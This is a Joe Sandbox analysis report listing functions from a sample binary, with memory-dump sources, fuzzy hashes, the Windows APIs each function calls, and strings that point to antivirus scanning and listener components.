Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300

Function 00007FFE1A51A1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction ID: e9e63e4b960bd7cfcb34c2f37e5de1f20d0a3ececb1af84c9e184d25eec958d8
Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction Fuzzy Hash: 9D51F862B0CB8185FB109B73A8405BA7BA2BB41BA4F1441B6EF5C67AA9DF3CD401C700

Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: EntryFunctionLookup
String ID:
API String ID: 3852435196-0
Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704

Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 000000014000E388

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40

Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 000000014000F398

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00

Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00

Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40

Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00000001400092EB

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700

Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40

Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40

Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40

Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704

Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710

Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700

Function 00007FFE1A51FD40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction ID: 59fa7d81a14b79a0ce93f6df39f42e77e019aba0d44b0c8d5ec2b45d14124a3f
Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction Fuzzy Hash: 4AF0C8B171C6518ADB958F69E402A393BD1E7487D0F8480BFD58C83B14C63C90509F04

Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWaitableTimer.KERNEL32 ref: 000000014000390C
#4.VSELOG ref: 000000014000395D
#4.VSELOG ref: 000000014000398D
EnterCriticalSection.KERNEL32 ref: 0000000140003996
LeaveCriticalSection.KERNEL32 ref: 00000001400039A7
WaitForMultipleObjects.KERNEL32 ref: 00000001400039CB
#4.VSELOG ref: 0000000140003A04
EnterCriticalSection.KERNEL32 ref: 0000000140003A0D
SetEvent.KERNEL32 ref: 0000000140003A52
ResetEvent.KERNEL32 ref: 0000000140003A5F
LeaveCriticalSection.KERNEL32 ref: 0000000140003A70
#4.VSELOG ref: 0000000140003AA1
#4.VSELOG ref: 0000000140003AD5

Strings

amps_Listen: pHandle=%pdetection type: %d, xrefs: 0000000140003C5F
amps_Listen: pHandle=%peventId: %d, xrefs: 0000000140003AC4
amps_Listen: pHandle=%p, message is:, xrefs: 0000000140003A90
amps_Listen: pHandle=%pobject archive name: %s, xrefs: 0000000140003B74
amps_Listen: pHandle=%pdetection name: %s, xrefs: 0000000140003BB2
amps_Listen: pHandle=%p, waiting for messages from the AMP queue, xrefs: 000000014000397C
amps_Listen: pHandle=%pobject type: %d, xrefs: 0000000140003B3D
amps_Listen: pHandle=%p, message received, pulling from AMP queue, xrefs: 00000001400039F3
amps_Listen: pHandle=%pdetection accuracy: %d, xrefs: 0000000140003C2B
amps_Listen: pHandle=%p, p=%p, xrefs: 0000000140003949
amps_Listen: pHandle=%paction taken: %d, xrefs: 0000000140003CC7
amps_Listen: pHandle=%psession Id: %d, xrefs: 0000000140003CFB
amps_Listen: pHandle=%pdetection message: %s, xrefs: 0000000140003BED
amps_Listen: pHandle=%pobject name: %s, xrefs: 0000000140003B02
amps_Listen: pHandle=%pdetection component type: %d, xrefs: 0000000140003C93
null, xrefs: 0000000140003AEF

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
API String ID: 1021822269-3147033232
Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 0000000140001054
GetProcAddress.KERNEL32 ref: 000000014000106C
FreeLibrary.KERNEL32 ref: 000000014000108F
GetProcAddress.KERNEL32 ref: 00000001400010D2
GetProcAddress.KERNEL32 ref: 00000001400010ED
GetProcAddress.KERNEL32 ref: 0000000140001108
GetProcAddress.KERNEL32 ref: 0000000140001123
GetProcAddress.KERNEL32 ref: 000000014000113E
GetProcAddress.KERNEL32 ref: 0000000140001159
GetProcAddress.KERNEL32 ref: 0000000140001174
FreeLibrary.KERNEL32 ref: 0000000140001194
InitializeCriticalSection.KERNEL32 ref: 00000001400011BE

Strings

vseGlobalInit, xrefs: 00000001400010C8
vseGlobalRelease, xrefs: 00000001400010DF
vseExec, xrefs: 0000000140001130
vseRelease, xrefs: 0000000140001115
MsiLocateComponentW, xrefs: 0000000140001062
vseGet, xrefs: 000000014000114B
{7A7E8119-620E-4CEF-BD5F-F748D7B059DA}, xrefs: 0000000140001081
vseInit, xrefs: 00000001400010FA
msi.dll, xrefs: 0000000140001042
vseSet, xrefs: 0000000140001166

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
API String ID: 883923345-381368982
Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700

Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002492
LeaveCriticalSection.KERNEL32 ref: 00000001400024A3
SetEvent.KERNEL32 ref: 00000001400024AD
EnterCriticalSection.KERNEL32 ref: 00000001400024C0
LeaveCriticalSection.KERNEL32 ref: 00000001400024D1
WaitForMultipleObjects.KERNEL32 ref: 00000001400024F1
CloseHandle.KERNEL32 ref: 00000001400024FB
CloseHandle.KERNEL32 ref: 0000000140002505
EnterCriticalSection.KERNEL32 ref: 0000000140002514
SetEvent.KERNEL32 ref: 000000014000255E
ResetEvent.KERNEL32 ref: 000000014000256B
LeaveCriticalSection.KERNEL32 ref: 0000000140002575
GetProcessHeap.KERNEL32 ref: 0000000140002591
HeapFree.KERNEL32 ref: 000000014000259F
GetProcessHeap.KERNEL32 ref: 00000001400025AE
HeapFree.KERNEL32 ref: 00000001400025BC
GetProcessHeap.KERNEL32 ref: 00000001400025CB
HeapFree.KERNEL32 ref: 00000001400025D9
GetProcessHeap.KERNEL32 ref: 00000001400025E8
HeapFree.KERNEL32 ref: 00000001400025F6

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
String ID:
API String ID: 1613947383-0
Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300

Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 000000014000451B
EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 0000000140004525
GetProcessHeap.KERNEL32 ref: 000000014000454C
HeapFree.KERNEL32 ref: 000000014000455A
SetEvent.KERNEL32 ref: 0000000140004567
ResetEvent.KERNEL32 ref: 0000000140004571
LeaveCriticalSection.KERNEL32 ref: 000000014000457B
CloseHandle.KERNEL32 ref: 000000014000458A
CloseHandle.KERNEL32 ref: 0000000140004599
LeaveCriticalSection.KERNEL32 ref: 00000001400045A3
DeleteCriticalSection.KERNEL32 ref: 00000001400045AD
GetProcessHeap.KERNEL32 ref: 00000001400045D2
HeapFree.KERNEL32 ref: 00000001400045E0
GetProcessHeap.KERNEL32 ref: 00000001400045F5
HeapFree.KERNEL32 ref: 0000000140004603

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304

Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON

